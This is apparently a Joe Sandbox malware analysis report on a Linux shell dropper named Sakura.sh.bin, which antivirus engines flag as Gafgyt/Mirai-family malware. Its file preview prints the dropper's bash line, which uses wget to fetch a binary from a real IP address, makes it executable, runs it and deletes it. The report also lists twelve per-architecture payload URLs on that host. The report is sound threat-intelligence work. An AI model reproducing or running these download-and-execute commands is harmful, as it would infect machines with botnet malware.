Edit tour

Linux Analysis Report
Sakura.sh.bin

Overview

General Information

Sample name:	Sakura.sh.bin
Analysis ID:	1641762
MD5:	57f1041fd8cdcbb4c369bb68bfd99db8
SHA1:	15df867f11dbdfc5500cd0b4a750ab5b0f861a92
SHA256:	6e2512f6f74cc6228d5925dda1324b5a81c7e70fa8505f1f4cee5140b1fc5380
Infos:

Detection

Score:	64
Range:	0 - 100

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected ShellDownloader

Executes the "wget" command typically used for HTTP/S downloading

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1641762
Start date and time:	2025-03-18 13:37:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:	default
Sample name:	Sakura.sh.bin
Detection:	MAL
Classification:	mal64.troj.linBIN@0/0@0/0

Warnings

VT rate limit hit for: http://45.135.194.28/a-r.m-7.Sakura;
VT rate limit hit for: http://45.135.194.28/m-p.s-l.Sakura;
VT rate limit hit for: http://45.135.194.28/p-p.c-.Sakura;

Runtime Messages

Command:	bash "/tmp/Sakura.sh.bin"
PID:	4717
Exit Code:
Exit Code Info:
Killed:	True
Standard Output:
Standard Error:	--2025-03-18 07:37:46-- http://45.135.194.28/m-i.p-s.Sakura Connecting to 45.135.194.28:80... connected. HTTP request sent, awaiting response... No data received. Retrying. --2025-03-18 07:37:49-- (try: 2) http://45.135.194.28/m-i.p-s.Sakura Connecting to 45.135.194.28:80... connected. HTTP request sent, awaiting response... No data received. Retrying. --2025-03-18 07:37:52-- (try: 3) http://45.135.194.28/m-i.p-s.Sakura Connecting to 45.135.194.28:80... connected. HTTP request sent, awaiting response... No data received. Retrying. --2025-03-18 07:37:57-- (try: 4) http://45.135.194.28/m-i.p-s.Sakura Connecting to 45.135.194.28:80... connected. HTTP request sent, awaiting response... No data received. Retrying. --2025-03-18 07:38:03-- (try: 5) http://45.135.194.28/m-i.p-s.Sakura Connecting to 45.135.194.28:80... connected. HTTP request sent, awaiting response... No data received. Retrying. --2025-03-18 07:38:09-- (try: 6) http://45.135.194.28/m-i.p-s.Sakura Connecting to 45.135.194.28:80... connected. HTTP request sent, awaiting response... No data received. Retrying. --2025-03-18 07:38:17-- (try: 7) http://45.135.194.28/m-i.p-s.Sakura Connecting to 45.135.194.28:80... connected. HTTP request sent, awaiting response... No data received. Retrying. --2025-03-18 07:38:26-- (try: 8) http://45.135.194.28/m-i.p-s.Sakura Connecting to 45.135.194.28:80... connected. HTTP request sent, awaiting response... No data received. Retrying.

Process Tree

system is lnxubuntu1

bash (PID: 4717, Parent: 4620, MD5: 5e666695cf08d1638bb85684e30185ee) Arguments: /bin/bash /tmp/Sakura.sh.bin

bash New Fork (PID: 4722, Parent: 4717)

wget (PID: 4722, Parent: 4717, MD5: acaead6d3c5bcc35a12ab496fa834365) Arguments: wget http://45.135.194.28/m-i.p-s.Sakura

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Sakura.sh.bin	JoeSecurity_ShellDownloader	Yara detected ShellDownloader	Joe Security

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

• AV Detection
• Networking
• System Summary
• Persistence and Installation Behavior
• Malware Analysis System Evasion

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Sakura.sh.bin

Avira: detected

Multi AV Scanner detection for submitted file

Source: Sakura.sh.bin	Virustotal: Detection: 64%			Perma Link
Source: Sakura.sh.bin	ReversingLabs: Detection: 70%

Source: /bin/bash (PID: 4722)

Wget executable: /usr/bin/wget -> wget http://45.135.194.28/m-i.p-s.Sakura

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28

Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive

Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/a-r.m-4.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/a-r.m-5.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/a-r.m-6.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/a-r.m-7.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/i-5.8-6.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/m-6.8-k.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/m-i.p-s.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/m-p.s-l.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/p-p.c-.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/s-h.4-.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/x-3.2-.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/x-8.6-.Sakura;

System Summary

Yara detected ShellDownloader

Source: Yara match

File source: Sakura.sh.bin, type: SAMPLE

Source: classification engine

Classification label: mal64.troj.linBIN@0/0@0/0

Source: /bin/bash (PID: 4722)

Wget executable: /usr/bin/wget -> wget http://45.135.194.28/m-i.p-s.Sakura

Jump to behavior

Source: /bin/bash (PID: 4717)

Queries kernel information via 'uname':

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	Direct Volume Access	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Non-Application Layer Protocol	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	11 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Sakura.sh.bin	65%	Virustotal		Browse
Sakura.sh.bin	71%	ReversingLabs	Win32.Trojan.Gafgyt
Sakura.sh.bin	100%	Avira	LINUX/Dldr.Agent.hlw

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://45.135.194.28/m-i.p-s.Sakura	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://45.135.194.28/p-p.c-.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/m-p.s-l.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/a-r.m-7.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/x-3.2-.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/m-i.p-s.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/m-6.8-k.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/a-r.m-4.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/a-r.m-5.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/s-h.4-.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/a-r.m-6.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/i-5.8-6.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/x-8.6-.Sakura;	Sakura.sh.bin	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.135.194.28	unknown	Germany		213030	SKYLINKCZ	false

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SKYLINKCZ	na.elf	Get hash	malicious	Prometei	Browse	45.135.194.29
	boatnet.arm.elf	Get hash	malicious	Mirai	Browse	45.135.194.29
	networkrip.mips.elf	Get hash	malicious	Mirai, Gafgyt	Browse	45.135.194.61
	networkrip.armv7l.elf	Get hash	malicious	Mirai, Gafgyt	Browse	45.135.194.61
	networkrip.x86.elf	Get hash	malicious	Mirai, Gafgyt	Browse	45.135.194.61
	networkrip.arm4.elf	Get hash	malicious	Mirai, Gafgyt	Browse	45.135.194.61
	networkrip.ppc.elf	Get hash	malicious	Mirai, Gafgyt	Browse	45.135.194.61
	networkrip.arm5.elf	Get hash	malicious	Mirai, Gafgyt	Browse	45.135.194.61
	networkrip.mpsl.elf	Get hash	malicious	Mirai, Gafgyt	Browse	45.135.194.61
	networkrip.sparc.elf	Get hash	malicious	Mirai, Gafgyt	Browse	45.135.194.61

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	Bourne-Again shell script, ASCII text executable
Entropy (8bit):	4.687336061912351
TrID:	Linux/UNIX shell script (7007/1) 100.00%
File name:	Sakura.sh.bin
File size:	2'098 bytes
MD5:	57f1041fd8cdcbb4c369bb68bfd99db8
SHA1:	15df867f11dbdfc5500cd0b4a750ab5b0f861a92
SHA256:	6e2512f6f74cc6228d5925dda1324b5a81c7e70fa8505f1f4cee5140b1fc5380
SHA512:	fe018d3aa481c685d6e6b30c982050d33f8901dbe5054ed2d0fa8035353441731fc9255345c454e505492ea075936350bdb33303cdc2d83df2f9f55b80665a56
SSDEEP:	48:vWd8jhttQdMwYnRV7WT68CwIDL1B5NwITxST:vWd8jhttQdMwYnRV7WT68CwIDBB5NwIw
TLSH:	BD412BD7119247F32C90DC3772698480F6D4919A9AC6AF4ABEDC3CE448BEDEC7444683
File Content Preview:	#!/bin/bash.cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://45.135.194.28/m-i.p-s.Sakura; chmod +x m-i.p-s.Sakura; ./m-i.p-s.Sakura; rm -rf m-i.p-s.Sakura.cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://45.135.194.28/

Network Behavior

Download Network PCAP: filtered – full

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 18, 2025 13:37:47.474900007 CET	55108	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:37:47.479726076 CET	80	55108	45.135.194.28	192.168.2.20
Mar 18, 2025 13:37:47.479827881 CET	55108	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:37:47.480415106 CET	55108	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:37:47.485050917 CET	80	55108	45.135.194.28	192.168.2.20
Mar 18, 2025 13:37:49.177409887 CET	80	55108	45.135.194.28	192.168.2.20
Mar 18, 2025 13:37:49.177768946 CET	55108	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:37:49.177984953 CET	55108	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:37:49.182638884 CET	80	55108	45.135.194.28	192.168.2.20
Mar 18, 2025 13:37:50.178895950 CET	55110	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:37:50.184542894 CET	80	55110	45.135.194.28	192.168.2.20
Mar 18, 2025 13:37:50.184618950 CET	55110	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:37:50.185069084 CET	55110	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:37:50.190723896 CET	80	55110	45.135.194.28	192.168.2.20
Mar 18, 2025 13:37:52.005737066 CET	80	55110	45.135.194.28	192.168.2.20
Mar 18, 2025 13:37:52.006344080 CET	55110	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:37:52.011229992 CET	80	55110	45.135.194.28	192.168.2.20
Mar 18, 2025 13:37:54.007208109 CET	55112	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:37:54.012011051 CET	80	55112	45.135.194.28	192.168.2.20
Mar 18, 2025 13:37:54.012068987 CET	55112	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:37:54.012506962 CET	55112	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:37:54.017153978 CET	80	55112	45.135.194.28	192.168.2.20
Mar 18, 2025 13:37:55.685745001 CET	80	55112	45.135.194.28	192.168.2.20
Mar 18, 2025 13:37:55.686347008 CET	55112	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:37:55.691683054 CET	80	55112	45.135.194.28	192.168.2.20
Mar 18, 2025 13:37:58.688395023 CET	55114	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:37:58.693160057 CET	80	55114	45.135.194.28	192.168.2.20
Mar 18, 2025 13:37:58.693253040 CET	55114	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:37:58.694766998 CET	55114	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:37:58.699377060 CET	80	55114	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:00.314659119 CET	80	55114	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:00.315243006 CET	55114	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:00.321449041 CET	80	55114	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:04.316098928 CET	55116	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:04.320832014 CET	80	55116	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:04.320915937 CET	55116	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:04.322434902 CET	55116	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:04.327135086 CET	80	55116	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:05.977113008 CET	80	55116	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:05.977720976 CET	55116	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:05.982379913 CET	80	55116	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:10.978945971 CET	55118	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:10.983715057 CET	80	55118	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:10.983788967 CET	55118	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:10.984224081 CET	55118	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:10.988822937 CET	80	55118	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:12.659077883 CET	80	55118	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:12.659871101 CET	55118	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:12.664643049 CET	80	55118	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:18.661252975 CET	55120	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:18.666095018 CET	80	55120	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:18.666184902 CET	55120	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:18.666766882 CET	55120	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:18.671447039 CET	80	55120	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:20.366688967 CET	80	55120	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:20.367285013 CET	55120	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:20.372900009 CET	80	55120	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:27.369807959 CET	55122	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:27.374461889 CET	80	55122	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:27.374547958 CET	55122	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:27.376090050 CET	55122	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:27.382116079 CET	80	55122	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:29.003300905 CET	80	55122	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:29.003973961 CET	55122	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:29.008662939 CET	80	55122	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:37.005919933 CET	55124	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:37.010581970 CET	80	55124	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:37.010668039 CET	55124	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:37.012166977 CET	55124	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:37.016792059 CET	80	55124	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:38.681329966 CET	80	55124	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:38.681930065 CET	55124	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:38.686739922 CET	80	55124	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:47.683984041 CET	55126	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:47.688776016 CET	80	55126	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:47.688865900 CET	55126	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:47.690439939 CET	55126	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:47.695076942 CET	80	55126	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:49.397171974 CET	80	55126	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:49.398107052 CET	55126	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:49.398925066 CET	55126	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:49.403548956 CET	80	55126	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:59.400753975 CET	55128	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:59.405502081 CET	80	55128	45.135.194.28	192.168.2.20
Mar 18, 2025 13:38:59.405564070 CET	55128	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:59.406023026 CET	55128	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:38:59.410717964 CET	80	55128	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:01.451893091 CET	80	55128	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:01.452486992 CET	55128	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:01.457649946 CET	80	55128	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:11.455020905 CET	55130	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:11.459892035 CET	80	55130	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:11.460010052 CET	55130	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:11.461536884 CET	55130	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:11.466226101 CET	80	55130	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:13.245846033 CET	80	55130	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:13.246206999 CET	55130	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:13.246479034 CET	55130	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:13.252660990 CET	80	55130	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:23.249154091 CET	55132	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:23.253962040 CET	80	55132	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:23.254086971 CET	55132	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:23.255594969 CET	55132	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:23.261033058 CET	80	55132	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:24.894987106 CET	80	55132	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:24.896806002 CET	55132	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:24.901552916 CET	80	55132	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:34.898622036 CET	55134	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:34.903373957 CET	80	55134	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:34.903455019 CET	55134	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:34.903887987 CET	55134	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:34.908536911 CET	80	55134	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:36.550884962 CET	80	55134	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:36.551475048 CET	55134	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:36.556138992 CET	80	55134	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:46.552409887 CET	55136	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:46.557343960 CET	80	55136	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:46.557442904 CET	55136	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:46.557913065 CET	55136	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:46.562519073 CET	80	55136	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:48.220493078 CET	80	55136	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:48.221272945 CET	55136	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:48.226085901 CET	80	55136	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:58.222266912 CET	55138	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:58.227008104 CET	80	55138	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:58.227099895 CET	55138	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:58.227543116 CET	55138	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:58.232197046 CET	80	55138	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:59.865338087 CET	80	55138	45.135.194.28	192.168.2.20
Mar 18, 2025 13:39:59.865920067 CET	55138	80	192.168.2.20	45.135.194.28
Mar 18, 2025 13:39:59.871133089 CET	80	55138	45.135.194.28	192.168.2.20

HTTP Request Dependency Graph

45.135.194.28

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.20	55108	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:37:47.480415106 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.17.1 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.20	55110	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
